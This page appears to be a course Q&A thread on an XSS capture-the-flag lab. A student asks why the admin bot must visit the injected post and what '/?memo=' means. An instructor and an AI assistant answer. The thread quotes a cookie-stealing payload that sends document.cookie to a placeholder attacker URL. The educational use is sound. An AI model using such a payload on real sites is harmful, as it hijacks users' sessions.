inflearn logo
강의

Khóa học

Chia sẻ kiến thức

Học hack web từ cơ bản đến trung cấp, tất cả trong một khóa học

Giải quyết bài toán Cross Site Scripting

XSS 1번 문제

27

s250226669

1 câu hỏi đã được viết

0

XSS 1번 문제에 왜 Activate admin bot을 특정 XSS한 게시물에 맞춰야 플래그가 나오는지 모르겠습니다. 그리고 <script>location.href = "공격자의 URL/?memo=" + document.cookie;</script> 의 공격 파라미터일 때 공격자의 URL앞에 나오는 /?memo=가 무슨 뜻인지도 궁금해요.

모의해킹

Câu trả lời 2

0

knockOn

코드를 보면 Admin Bot이 특정 게시물을 방문하도록 설계되어 있기 때문입니다.

핵심은 /admin/<post_id> 입니다.

@app.route("/admin/<int:post_id>", methods=["GET", "POST"])
def admin(post_id):
    target_url = localhost + f"/post/{post_id}"

    cookie = {"name": "cookie", "value": SECRET_KEY}
    success = read_url(target_url, cookie)

여기서 Bot은:

  1. cookie=SECRET_KEY 를 가진 상태로

  2. /post/<post_id> 페이지를 방문하게 됩니다!

/?memo= 는 단순히 파라미터로 나누기 위한 값 입니다! 임의로 다른 값으로 설정해도 됩니다 :)


0

s250226669

감사합니다.

0

communityai8509

안녕하세요, 인프런 AI 인턴입니다. 김재경님.

XSS 1번 문제에서 ‘Activate admin bot’ 버튼을 사용하는 이유는, XSS 공격이 실제 서버나 클라이언트 환경에서 어떻게 작용하는지를 이해하기 위함입니다. 이 과정에서, 어드민 봇은 해당 게시물을 실행하여 실제 XSS 공격이 이뤄졌을 때의 상황을 시뮬레이션하게 됩니다. 이는 XSS의 본질적인 목표인 세션 탈취나 비인가 접근을 얼마나 효과적으로 수행할 수 있는지를 검증할 수 있는 좋은 방법 중 하나입니다.

또한, <script> 태그 내의 공격 파라미터에 대해 설명드리겠습니다. location.href = "공격자의 URL/?memo=" + document.cookie;에서 / 뒤의 ?memo=는 쿼리 파라미터 포맷을 사용하여 쿠키 데이터를 공격자가 지정한 URL로 전송하려는 의도를 나타냅니다. 이는 서버가 추가적인 정보를 가져가는 방식으로 자주 사용되며, 쿼리 파라미터를 통해 다수의 정보를 서버 측으로 전달할 수 있습니다.

문제와 관련된 추가적인 정보나 유사한 사례를 참고하시려면 아래의 유사한 질문 링크를 확인하실 수 있습니다:
- XSS 문제 해결 팁과 사례 분석

저는 질문자님의 이해를 돕고자 지식공유자님의 기존 답변을 참고하여 유사한 답변 링크를 추천해드리고 있습니다.
현재 베타 기능으로 답변이 만족스럽지 않을 수 있는 점 양해 부탁드립니다. 🙏
추가적으로 궁금한 점이 있으시면, 이어서 질문해 주세요. 곧 지식공유자께서 답변해 주실 것입니다.

뭘하라는건지 모르겠네요

0

48

2

인증 후에도 동일 메시지가 보이네요

0

87

2

CRLF Injection 문제

0

103

2

discord email 인증

0

96

2

CRLF 질문 있습니다

0

79

2

Dom clobbering 관련 문의

1

105

2

디스코드 트랙 관련 문의

0

78

1

백틱 사용 이유가 뭐에요?

0

105

2

SQLi-WAF-5 강의

0

81

2

미션 어떻게 하는 거에요?

0

95

1

XSS 1번문제 질문

0

101

2

xss_WAF_4가 안 됩니다

0

85

2

백슬래시에 관하여

0

62

2

SQL Injection - Login

0

214

2

공백 우회 관련 질문 있습니다

0

94

2

제가 이해한게 맞는지 궁금합니다

0

69

2

XSS-WAF-4 문제 질문

0

103

2

디스코드 이메일 인증 문의드립니다

0

589

2

KnockOn에 접속할 수 없습니다

0

117

2

SQL Injection - DB 질문

0

94

2

XSS-WAF4 문제풀이

0

103

2

디스코드에 들어가지지 않습니다

0

154

2

SQL Injection 실습

0

232

2

60번 게시글 질문

0

122

2